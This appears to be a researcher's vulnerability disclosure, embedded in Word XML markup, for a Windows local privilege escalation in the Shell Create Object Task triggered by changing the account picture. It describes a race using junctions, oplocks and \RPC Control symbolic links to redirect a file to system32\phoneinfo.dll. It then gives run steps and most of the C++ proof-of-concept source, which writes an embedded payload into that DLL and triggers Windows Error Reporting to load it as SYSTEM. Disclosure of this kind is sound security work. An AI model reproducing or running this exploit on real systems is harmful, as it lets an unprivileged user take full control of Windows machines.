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i1rrvq91c1k" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege escalation in Shell Create Object Task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an user account picture is changed DCOM will execute Shell Create Object Task Server as system, and it will write the the new picture to C:\users\public\AccountPictures.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sounds very straight forward to exploit, but due to various protections I have given up on it 3 times.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Now I brought a new trick and was finally able to exploit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trick is invented by James Forshaw it can be read up on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https://www.alchemistowl.org/pocorgtfo/pocorgtfo13.pdf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But its essence is how to craft an path in NT Object namespace that will take as long as possible to parse.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the user account picture is changes the following file actions will happen(under c:\users\publi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c\AccountPictures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\AccountPictures\S-1-5-21-2781542633-746229175-3265460138-1001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 checked if it redirects to another path.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\S-1-5-21-2781542633-746229175-3265460138-1001\{2E84DAF4-572D-4F17-A374-336A1E77E9B6}-Image96.jpg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 created, notice that the filename contains an random GUID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\S-1-5-21-2781542633-746229175-3265460138-1001\{2E84DAF4-572D-4F17-A374-336A1E77E9B6}-Image96.tmp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 created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\S-1-5-21-2781542633-746229175-3265460138-1001\~2E84DAF4-572D-4F17-A374-336A1E77E9B6}-Image96.tmp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 created and the calling user is granted full permission to the file.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\S-1-5-21-2781542633-746229175-3265460138-1001\{2E84DAF4-572D-4F17-A374-336A1E77E9B6}-Image96.jpg~RFb1bdf30.TMP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Is created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it repeats but for Image32 instead of image96.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goes through:192, 40, 448, 32 ,48 ,240 ,96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possible exploitation is path is. If we can redirect the file where the calling user is granted full permission to a better place and filename, we can plant a sideloading dll in system32 and overwrite with our own payload.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to redirect that we need to know the name of the file, before it is created, to make an symbolic link in NT Object namespace.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first file is created we know the random GUID that will be used for the other files, but before I can detect the file is created its too late.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here we use James trick :)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We make a thread that switches </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c:\users\public\AccountPictures between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 mount point targetting an slow NT Object path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forwarding to %TEMP%\\fakedir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The switching is needed because we have to pass the initial redirection check, but after that we switch- before the first file is created.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Now every file operation will have an 8 second delay.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Then we subscribe to file notifications in the directory we redirect to after the delay lookup.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When we get a trigger for the first file is created we take the filename and replace the number with the next file we know it will create.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We create that file and put an OPLOCK on it, when that triggers we freeze the service operations.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When oplock trigger we move all files in the directory to c:\windows\temp , then we create symbolic links in \RPC Control, one for each filename we know will get created- and forward them to c:\windows\temp.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Expect the file that gets custom permissions, its symbolic link will point to C:\windows\system32\phoneinfo.dll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Now, having an empty directory, we make AccountPictures into a junction point targeting \RPC Control.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Then the oplock is broken C:\windows\system32\phoneinfo.dll is created and the caller gets full permission to it.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In my attached POC I also have a thread that watches for phoneinfo.dlls creation and then write custom payload to it.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Then an error report is submitted to Windows Error Reporting service, to make it load phoneinfo.dll as SYSTEM.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When that happens a command prompt launches and a custom message is shown.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c0enh1ighn7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lmjt7otbglwg" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the POC: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First, launch the exe- you will see alot of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NT::objdir::details::create \RPC Control\08F17F\primary\ opened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NT::objdir::details::create \RPC Control\08F17F\shadow\ opened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That is NT Object dir collisions being built.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When it changes and start writing about creating mount points it is now you should change the picture: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57450" cy="4095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First start, change account settings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Then select “Browse for one” and choose any picture.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64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It will stand and draw circles for ~ 5 minutes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Then this will popup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Note, it only works ⅘ times, as we may miss the initial race- on failure just start app, choose picture again.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#include "resource.h"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#include &lt;exploitLib/exploitLib.h&gt;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#include "com.h"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#include "exploitLib/primitives.h"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#include "misc.h"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#include "exploitLib/IPC/WER.h"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using namespace x::literalNS;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static x::file sidDir = { "\\??\\Nul"_p };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static  bool loop = true;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//This class will in a seperate tread switch c:\users\public\accountpictures\%currentSID%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//Between being a junction to a delayer and a normal folder in a loop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//The goal being the folder passing check for being a junction folder, but becoming one afterwards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//As the delayer when triggered adds 8 seconds delay odds are acceptable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struct junctionmaker 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template&lt;typename T,typename A&gt;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junctionmaker(A&amp; f, T&amp; t)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f.makeJunction(t );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  while (loop) {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     try {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    Sleep(100);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   sidDir.delJunction();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        Sleep(1);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      sidDir.makeJunction(t );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     catch (...) {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      Beep(10000,3000);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            std::wcout &lt;&lt; L"Race condition not won" &lt;&lt; std::endl;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       try { sidDir.delJunction(); } catch (...) {};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            for (auto&amp; f : sidDir.enumDir())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             x::file{ "%TEMP%\\fakedir"_p / f,DELETE }.rename(std::wstring{ L"\\??\\C:\\windows\\temp\\"s + f.path().filename().c_str() });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//When the %sidfolder% is redirected to \RPC Control links are made to %WINDIR%\temp for .jpg files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//Since that is also where the files are moved to, the execution flow continues normally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//The temp file that will get changed permissons on we redirect to %windir%\system32\phoneinfo.dll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void makeLinks(std::wstring filename)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auto justguid= filename.substr(0, (filename.find_last_of(L'}'))+1);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static std::vector&lt;x::symlink&gt; links;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for (auto&amp; index : { L"192", L"40",L"448",L"32" ,L"48",L"240",L"96"})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 try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    auto jpgname = justguid + L"-Image"s + index + L".jpg"s;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         auto tmpname = justguid + L"-Image"s + index + L".tmp"s;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   links.emplace_back(  L"\\RPC Control\\"s + jpgname, "\\??\\%windir%\\temp"_p / jpgname);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     links.emplace_back(L"\\RPC Control\\"s + tmpname, "\\??\\%windir%\\temp"_p / tmpname);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     tmpname[0] = L'~';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     links.emplace_back(L"\\RPC Control\\"s + tmpname, L"\\??\\%WINDIR%\\system32\\phoneinfo.dll");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} catch (...) {}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//Here we create a file in %siddir% before the service gets to creating it.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//We put an oplock on it, to freese the service when trying to create it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//When triggered we move all files to %WINDIR%\temp then make %SIDDIR% a junction to \RPC Control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void makeLock(std::wstring filename)  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   auto justguid = filename.substr(0, (filename.find_last_of(L'}')) + 1);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auto jpgname = justguid + L"-Image448.jpg"s;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static x::file oplockFile{ "%TEMP%\\fakedir"_p / jpgname ,DELETE};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oplockFile.makeoplock(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      [=](auto file) {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     makeLinks(filename);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         oplockFile.rename( "\\??\\%WINDIR%\\temp"_p / jpgname );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   for (auto&amp; f : x::file{ "%TEMP%\\fakedir"_p }.enumDir())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            x::file{ "%TEMP%\\fakedir"_p / f,DELETE }.rename( std::wstring{ L"\\??\\C:\\windows\\temp\\"s + f.path().filename().c_str() } );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         x::file{  "%TEMP%\\fakedir"_p , FILE_WRITE_ATTRIBUTES}.makeJunction(L"\\RPC Control");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         return false;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int main(int, char* args[])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   //Recreate the fakedir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   x::file oldfakedir{ "%TEMP%\\fakedir"_p  , DELETE , FILE_OPEN_REPARSE_POINT | FILE_DIRECTORY_FILE ,FILE_OPEN_IF };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   oldfakedir.rename("\\??\\%TEMP%"_p / x::guid::random_guid());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   x::file fakedir{ "%TEMP%\\fakedir"_p  , FILE_WRITE_ATTRIBUTES , FILE_OPEN_REPARSE_POINT | FILE_DIRECTORY_FILE ,FILE_OPEN_IF};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  //Start monitoring for when a file is created in the fakedir, so we know the filename of the next file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auto fw=fakedir.monitorFolderChanges( true, wil::FolderChangeEvents::All,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      [&amp;](wil::FolderChangeEvent e, PCWSTR f)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         if( loop )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            loop = false;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            makeLock(f);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   bool wrotePayload = false;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   auto fwa = x::file{ "%WINDIR%\\system32"_p }.monitorFolderChanges(true, wil::FolderChangeEvents::All,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      [&amp;](wil::FolderChangeEvent e, PCWSTR f)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       if (L"phoneinfo.dll"s == f) {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            while (!wrotePayload)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           Sleep(1000);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x::file payload{ "%WINDIR%\\system32\\phoneinfo.dll"_p, FILE_GENERIC_WRITE,FILE_SYNCHRONOUS_IO_ALERT };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payload.writedata(x::getPayload&lt; EMBEDDED_PAYLOAD&gt;());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wrotePayload = true;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submitBlankReport();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               catch (...) {}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//Recreate the %public%\\AccountPictures dir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 x::file oldpictureDir{ "%public%\\AccountPictures"_p  , FILE_WRITE_ATTRIBUTES|DELETE, FILE_OPEN_REPARSE_POINT | FILE_DIRECTORY_FILE };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  oldpictureDir.rename("\\??\\%TEMP%"_p / x::guid::random_guid());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 x::file pictureDir{ "%public%\\AccountPictures"_p  , FILE_WRITE_ATTRIBUTES, FILE_OPEN_REPARSE_POINT | FILE_DIRECTORY_FILE };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x::file sidInPictureDir{ "%public%\\AccountPictures"_p  / x::getCurrentUserSidString() , FILE_WRITE_ATTRIBUTES, FILE_OPEN_REPARSE_POINT | FILE_DIRECTORY_FILE };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sidDir = sidInPictureDir;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x::delayer d{ "\\??\\%TEMP%\\fakedir"_p };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x::threaded&lt; junctionmaker &gt;{ sidDir, d };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getchar();  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catch (wil::ResultException &amp; e)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std::wcout &lt;&lt; _com_error{ (HRESULT)RtlNtStatusToDosError(e.GetErrorCode()) }.ErrorMessage() &lt;&lt; std::endl;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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;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lchemistowl.org/pocorgtfo/pocorgtfo13.pdf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